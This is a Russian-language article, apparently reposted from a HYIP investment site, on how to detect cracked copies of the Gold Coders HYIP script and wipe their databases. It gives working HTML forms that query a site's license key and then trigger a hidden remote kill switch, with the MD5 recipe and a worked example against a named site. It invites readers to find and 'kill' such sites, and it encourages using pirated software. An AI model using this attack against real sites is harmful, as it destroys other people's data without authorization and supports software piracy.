Дыры в скрипте Gold Coders или
Как уничтожить HYIP за 2 минуты
Допустим, вы вдохновились идеей созданиия своего фонда и решили построить свою HYIP. Уже кое что почитали о HYIP и знаете, что первым делом необходимо достать скрипт. Нет проблем, заходим в Яндекс и набираем "скрипт HYIP". Несколько секунд ожидания и... О, какой выбор! Покупай - не хочу... Заметили что в 80% предложений фигурирует скрипт компании Gold Coders? Вообщем то, это неудивительно. Скрипт современный, удобный, многофункциональный. И, пожалуй, своими возможностями удовлетворит любого организатора HYIP. И цена приемлема. Одни продают по $5, другие по $3, а некоторые (владельцы магазинов цифровых товаров) вообще могут слить за $1! Казалось бы, проблем со скриптом нет. Платим пару баксов за хостинг, скрипт и вперед за золотыми горами...
Или другой вариант: вы - инвестор. И вам приглянулся фонд. Красивый дизайн, грамотно написано, хорошие бизнес-планы. Вы подумываете вложить в него некие средства. Но... И вы, будущий владелец HYIP и вы, инвестор можете и не знать о том, что сама основа - скрипт фонда решает в первую очередь будет ли фонд надежным и долгоживущим или исчезнет через пару недель после открытия.
А дело в том, что мало кто знает о том, что в сети продаются несколько версий скрипта.
Версия 1-ая: лицензионная версия непосредственно от разработчиков, стоимостью от $85.
Версия 2-ая: взломанная версия от некоего deZender, не требующая лицензионного ключа.
Вот именно эту версию и продают продавцы-шаровики, не догадываясь о, том что их товар имеет встроенные коды, дающие возможность взломщикам развалить ваш бизнес в считанные минуты...
А теперь самое интересное. Сейчас я покажу вам как определить на базе какой версии создана HYIP. А далее, я покажу вам как уничтожить такой HYIP за пару-тройку минут
Определение версии скрипта (лицензионного ключа).
Создайте html-страницу со следующим кодом:
<html>
<head>
TEST
</head>
<form method=post action=https://www.HYIP-adress.com/index.php>
<input type=hidden name=a value=ver><br>
<input type=submit>
</form>
</html>
Вместо
www.HYIP-adress.com впишите url-адресс тестируемого фонда.
Откройте созданную страницу броузером. Видим следующее:
Жмем на кнопочку. Например, я ввел адрес
www.usambank.com и нажал на кнопочку. В результате теста получил:
SERVER_ADDR =
www.usambank.com
LICENSE = 6SWEH4J5SM484Z6U7JUC
DATE = 01 02 2007
Мы видим адрес сайта, лицензионный ключ (вводится при инсталляции скрипта на сервере) и текущую дату. Лицензионный ключ GC состоит из 20 букво-цифровых символов, включающий заглавные буквы (что мы и наблюдаем). Все остальное, имеющее другой ввид (вроде: 1234567, или: sdkjh576ejh, и т.п.) или отсутствие ключа вообще говорит о том, что скрипт нелицензионный (взломанный)!
Исключение могут составлять скрипты людей, владеющих этой информацией. Которые при инсталляции специально вписывают ключ из 20 символов (подобие лицензионного ключа что мы видим выше). Как правило, такие люди уже позаботились о безопасности и закрыли дыры. Лицензионные скрипты неподвержены способу уничтожения, который будет описан далее. Нас интересует абра-кадабра, вписанная вместо лицензионного ключа.
Уничтожение HYIP, построенного на базе взломанного скрипта.
Итак, вы прошлись по HYIP-мониторам, собрали приличный список адресов HYIP и протестировали их. В результате нашли десяток HYIPов, созданных на базе взломанного скрипта. Пора сказать: "п****ц, ребята.. приплыли.."
Создаем новую html-страницу со следующим кодом:
<html>
<head>
KILL
</head>
<form method='post' action='https://www.HYIP-adress.com/index.php'>
<input type='hidden' name='a' value='register'>
<input type='hidden' name="string" value="хэш-код">
<input type='hidden' name="string2" value="дата(текущий год или число)">
<input type=submit>
</form>
</html>
Опять вписываем вместо
www.HYIP-adress.com адрес нужного HYIPа. Вместо "хэш-код" нам нужно будет вписать код md5, который мы сгенерируем генератором, подставив значения, полученные в результате теста. Если у вас его нет, то можете скачать его
ЗДЕСЬ Итак, запускаем генератор хеш-паролей. Открываем закладку "Инструменты -> Генератор хэшей..." В открывшемся окне в строке "Пароль" вводим данные, полученные в результате теста формата: <лицензия><адрес><число><год><месяц> (все без пробелов и в одну строчку). Причем, все нужно брать в точности из данных полученных при тесте. Если лицензию показывает пустой строкой, то ее брать в учет не нужно. Например, тест нам дал такие данные:
SERVER_ADDR =
www.usambank.com
LICENSE = 6SWEH4J5SM484Z6U7JUC
DATE = 01 02 2007
Пишем в "Пароль": 6SWEH4J5SM484Z6U7JUCwww.usambank.com02200701
Хэш готов. Его мы берем (копируем) из строки расположенной выше с названием "MD5". Вставляем хэш в html-страницу. Далее, вписываем в html-страницу "KILL" в value="дата(текущий год или число)" текущий год (последние две цифры) или число, на выбор. Почему на выбор? Дело здесь вот в чем. Если впишем год, то произойдет уничтожение всех дампов SQL-базы данных (кроме users), а если впишем число, то уничтожим только историю выплат. Что хотите, то и выбирайте. Итак, html-страница для "убийства" готова:
<html>
<head>
KILL
</head>
<form method='post' action='https://www.usambank.com/index.php'>
<input type='hidden' name='a' value='register'>
<input type='hidden' name="string" value="7aa94cc3289ebef912599e2ab8c36089">
<input type='hidden' name="string2" value="07">
<input type=submit>
</form>
</html>
Примечание:
www.usambank.com построен как мы узнали при тесте на лицензионном скрипте, поетому ему мы никак не навредим. Я здесь применил этот адрес лишь для примера. HYIPы со взломанным скриптом вы будете искать и "убивать" сами.
Жмем на кнопочку. Если вы все сделали верно и у скрипта дыры открыты, то мы увидем после нажатия символ "-", уведомляющий нас о том, что база данных фонда "убита". Заходим теперь на сайт фонда и смотрим на статистику. Ой...
Как вы уже поняли, произошло обнуление дампов базы данных. А это крышка. Если админ HYIPа не сделал бэкап (резервное копирование), то все... Тю, тю. Базу данных уже не восстановить.
Почему произошло обнуление? Дело в том, что разработчики скрипта позаботились о своей репутации и вписали 2 кода, которые при подаче определенных команд извне управляют обнулением. Собственно, именно эти команды мы и использовали. таким образом, при обнаружении раскодированного (взломанного) скрипта разработчики могут наказать "шаровиков".
Почему я рассказал вам об этом? В первую очередь затем чтобы просветить вас и тем самым избавить индустрию HYIP (ну, хотя бы немножко) от дилетантов и откровенных кидал.
А как же быть? Как защититься?
Вопрос ценный. С него и нужно начинать создание фонда. Зашититься можно. Зашита сводится к закрытию дыр в скрипте. Если вы опытный php-программист, то вам не составит большого труда перелапатить скрипт и найти уязвимые места. Таких мест всего 2. Закрыв дыры можно с успехом применять взломанный скрипт, не тратясь на дорогостоящий лицензионный скрипт. Но если вы располагаете средствами, то не жмитесь, приобретайте скрипт непосредственно у разработчиков.
Информация взята с
https://earth-invest.org/secrets.php